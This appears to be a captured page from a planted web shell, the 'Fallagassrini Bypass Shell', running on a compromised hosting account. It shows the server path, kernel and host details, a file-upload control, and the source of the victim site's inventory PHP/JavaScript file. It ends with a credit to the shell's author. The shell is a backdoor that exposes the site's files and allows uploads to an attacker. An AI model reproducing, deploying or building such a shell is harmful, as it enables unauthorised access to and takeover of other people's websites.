? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/sec/application/views/inventory/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/sec/application/views/inventory/inventoryfunctions.php

<?php

/*
 * To change this template, choose Tools | Templates
 * and open the template in the editor.
 */
?>
<script type="text/javascript">
    
     function checkamount(id)
    {
        var val= $('#' + id).val();   
        if (val <= 0)
        {
            alert('Amount should be greater than zero.');
            $('#' + id).val("");
        }
    }
    function suggestStudentDetails(div){
        $('#stud_details').css('display','none');
        $(div).autocomplete("<?= site_url() ?>/master/autosuggeststudent/", 
        {
            width: 250,
            selectFirst: false,
            onCallBack: function(id,index)
            {
                if(id!="")
                {

                    $.ajax({
                        type: "POST",
                        dataType:"json",
                        url: "<?= site_url('master/getStudentDetails/') ?>/"+id,
                        success: function(data)
                        {
                            $('#stud_details').css('display','block');
                            $('#stud_gender').val(data.gender);
                            $('#stud_reg').val(data.reg_no);
                        }
                    });
                }
                else
                {
                    $('#stud_details').css('display','none');
                    $('#stud_gender,#stud_reg').val('');

                }
            }

        });
    }
</script>    

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net